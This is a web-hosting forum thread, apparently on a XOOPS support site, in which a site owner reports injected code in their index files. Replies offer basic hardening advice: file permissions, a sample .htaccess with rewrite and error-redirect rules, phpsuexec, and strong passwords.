This morning we found the following code embedded in all of our index.htm/php files:



I don't know what this does, but I'm guessing that the hacker is gathering information about servers that they have busted into. I looked up the domain, and it is registered on a Russian registrar. I've written to the "owner", but naturally I don't expect a response.

Is there a reliable way to prevent index files from being overwritten? We've had a string of problems with our site lately and the boss is ready to shoot someone (ie. me).

Also, is this likely to be an issue with the way the server is configured, or that my site is configured?

Thanks.

PS: Yes I have Protector!

Protector will only help you if your web hosting provider has configured their server correctly. So, yes this is most likely a server configuration issue.

In a nutshell, once a hacker has shell access to the server your site is hosted on, there is virtually nothing you can do to stop them. HOWEVER, there are some precautions you can take to help prevent hackers from gaining access.

First and foremost, make sure you use the most restrictive file and folder permissions possible. See My site has been hacked! What do I do? for more information. Personally, I'm p@r@n0!d, so I use even more restrictive permissions, but my hosting environment allows such a configuration; most don't.

Most hosting environments support some basic form of overriding the default Apache configuration using .htaccess files. Here is a sample .htaccess file I use on my sites that does some pretty basic stuff that can help protect your site.

One of the most basic precautions you can take to protect your site is to follow the directions given when installing your site. In other words, make sure that the install directory is deleted after install. Also, make sure that mainfile.php is not writeable.

Another basic security principle is to make sure you always use strong passwords. Strong passwords usually consist of at least 7 characters including numbers, lower-case letters, upper-case letters, and special symbols (like !@#$%&?).

To be quite blunt, there is absolutely no way of guaranteeing security on your website; however, educating yourself about basic security principles and implementing the “best practices” will go a long way towards fighting off the jerks who want to hack your site.

Hope that helps,

James

Thanks James

We're compliant with the FAQ, but don't have an equivalent rewrite rule. What does it actually do?

I'm pretty sure the server is affected now as I can see the same dodgy URL flashing up a few times when I load pages in cPanel.

We reported the problem and restored our site from backup, so its online and 'uninfected' again, but probably not for long if our hosting company can't close the hole(s).

Protector doesn't work!!

Sorry I did post this when it happened to me, yet none notice and maybe i should have been more clear for all....


Index.php of XOOPS must also be made 444 chmod as to only be accessible by the server and not writable.

that then fixes this security issue; yet there is one even with protector as same happened to me and then added protector, yet still occurred.

RE: Protector....

Protector does work, but it cannot stop someone if they have shell access on the server. Nothing but a properly configured server can stop hackers once they have shell access.

RE: .htaccess...

Options All -Indexes
^^Turns off fancy indexing. That way, if a directory is called that doesn't have an index.html/php file, the server will generate a 400 error

RewriteEngine on
^^Turns on the rewrite engine

RewriteCond %{HTTP_HOST} !^pkbcs\.com$
RewriteRule ^(.*)$http://pkbcs.com/$1 [L,R=301]
^^Only provides SEO by keeping your URI consistent in the search engines

ErrorDocument 400http://pkbcs.com/
ErrorDocument 401http://pkbcs.com/
ErrorDocument 402http://pkbcs.com/
ErrorDocument 403http://pkbcs.com/
ErrorDocument 404http://pkbcs.com/
ErrorDocument 405http://pkbcs.com/
ErrorDocument 406http://pkbcs.com/
ErrorDocument 407http://pkbcs.com/
ErrorDocument 408http://pkbcs.com/
ErrorDocument 409http://pkbcs.com/
ErrorDocument 410http://pkbcs.com/
ErrorDocument 411http://pkbcs.com/
ErrorDocument 412http://pkbcs.com/
ErrorDocument 413http://pkbcs.com/
ErrorDocument 414http://pkbcs.com/
ErrorDocument 415http://pkbcs.com/
ErrorDocument 500http://pkbcs.com/
ErrorDocument 501http://pkbcs.com/
ErrorDocument 502http://pkbcs.com/
ErrorDocument 503http://pkbcs.com/
ErrorDocument 504http://pkbcs.com/
ErrorDocument 505http://pkbcs.com/
^^Redirects the browser to your homepage in the event of any of the above errors. This works with the Options All -Indexes line.

The .htaccess file isn't that comprehensive. If you do a little research on it, you can deny access to specific folders from a browser and a few more tricks to tighten down your site. Keep in mind though, these are only useful for web browsers. If the user has shell access, it won't do any good.

Also, I would suggest getting very familiar with chmod settings. Often times, you can go much stricter on the file/folder permissions than XOOPS documentation suggest, but you have to experiment and see what your hosting environment will support.

HTH.

James

sometimes they can do this without shell access if folder chmod settings are 777 (quite common problem i'm afraid)

the best way is to run PHP with phpsuexec in CGI mode & make sure that user accounts on the server run under the user account instead of user = nobody.

in phpsuexec mode, you can set folders to say 755, which prevents this kind of thing happening. but as James says, it's definitely 1 for the host to take on board.

you could also try changing the index.htm files to read only.. php 444 etc..